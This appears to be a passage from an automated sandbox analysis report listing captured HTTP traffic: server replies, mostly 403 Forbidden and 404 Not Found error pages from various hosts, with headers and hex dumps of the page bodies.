              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:39 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=87X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 79d93f16-3660-4aa0-8712-13873bb5cbfbCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wZVYPReXhueggSI89MoXLh3NYdzzo1GB2AsNR4ABp7t0PsKq%2FIum6GZYtTzsyKFsgaBoxFHlFS01XSgv1YVazzhuI7VzfjQH8VwoIUDWmnAmTZx7Ks%2FEnMgN70ejqdA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=135.999918Server: cloudflareCF-RAY: 806e74d309c70f47-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:44 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:44 GMTServer: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:26:53 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:54 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.19.10X-Wix-Request-Id: 1694755614.79276555286655813076X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Fri, 15 Sep 2023 05:26:54 GMTX-Served-By: cache-iad-kiad7000102-IADX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDuVia: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:27:10 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WaQ5Ohkyn8nbvkER1r4k2rGxPhiJMJgVDT1591vijqtI9da%2BWmfR%2FJqajR4pKQ7w79yPI7t1bBgN8mEHlBUrLf6KE3qv58x0cthLW1bWyOYOQbH34La%2BOfTaCnYfIii9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7521cf7b433d-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-eq
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:26:55 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:55 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:55 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:56 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 